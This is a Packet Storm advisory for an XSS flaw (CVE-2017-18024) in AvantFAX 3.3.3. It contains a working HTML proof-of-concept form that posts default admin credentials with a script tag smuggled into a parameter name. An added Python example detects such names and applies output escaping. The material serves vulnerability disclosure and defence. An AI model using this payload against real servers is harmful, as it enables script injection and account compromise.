packetstorm, Nassim Asrir, PACKETSTORM:145776
Jan 09, 2018 - 12:00 a.m.

AvantFAX 3.3.3 Cross Site Scripting

2018-01-09 00:00:00
Nassim Asrir
packetstormsecurity.com

EPSS: 0.001 (percentile: 31.9%)

`# Title: AvantFAX 3.3.3 - XSS  
  
# Author: Nassim Asrir  
  
# Contact: [email protected]  
  
# Vendor: https://www.officetracker.com/  
  
# CVE: CVE-2017-18024  
  
# Description  
  
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,  
as demonstrated by a parameter whose name contains a  
SCRIPT element and whose value is 1.  
  
------------------------------------------  
  
# Details  
  
The name of an arbitrarily supplied body parameter is copied into the  
HTML document as plain text between tags. The payload  
jlbqg<script>alert(1)</script>b7g0x was submitted in the name of an  
arbitrarily supplied body parameter. This input was echoed  
  
------------------------------------------  
  
# Attack Type  
  
Remote  
  
------------------------------------------  
  
  
# POC  
  
<html>  
  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://server/" method="POST">  
<input type="hidden" name="username" value="admin" />  
<input type="hidden" name="password" value="admin" />  
<input type="hidden" name="_submit_check" value="1" />  
<input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
`
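
An added example, not part of the advisory and not AvantFAX code: a check that flags POST parameter names carrying markup (including double-encoded ones), next to the output encoding that makes an echoed name inert. The function names, the field-name allowlist and the sample body are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, unquote

# Assumption: legitimate form field names use only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.\[\]-]+")

# Constructed sample: the urlencoded body the PoC form above would submit.
SAMPLE_BODY = (
    "username=admin&password=admin&_submit_check=1"
    "&jlbqg%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb7g0x=1"
)


def decode_name(name, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded names are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    return name


def suspicious_param_names(body):
    """Return decoded parameter names that fall outside the allowlist."""
    flagged = []
    for raw_name, _value in parse_qsl(body, keep_blank_values=True):
        name = decode_name(raw_name)
        if not SAFE_NAME.fullmatch(name):
            flagged.append(name)
    return flagged


def render_param_names(body):
    """Echo every parameter name into HTML with output encoding applied."""
    names = [n for n, _ in parse_qsl(body, keep_blank_values=True)]
    items = "".join(f"<li>{html.escape(n, quote=True)}</li>" for n in names)
    return "<ul>" + items + "</ul>"


if __name__ == "__main__":
    print(suspicious_param_names(SAMPLE_BODY))
    print(render_param_names(SAMPLE_BODY))
```

The allowlist check suits request logging or a filtering proxy; the encoding in `render_param_names` is the fix that belongs in any code path that writes a request-supplied name into a page.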
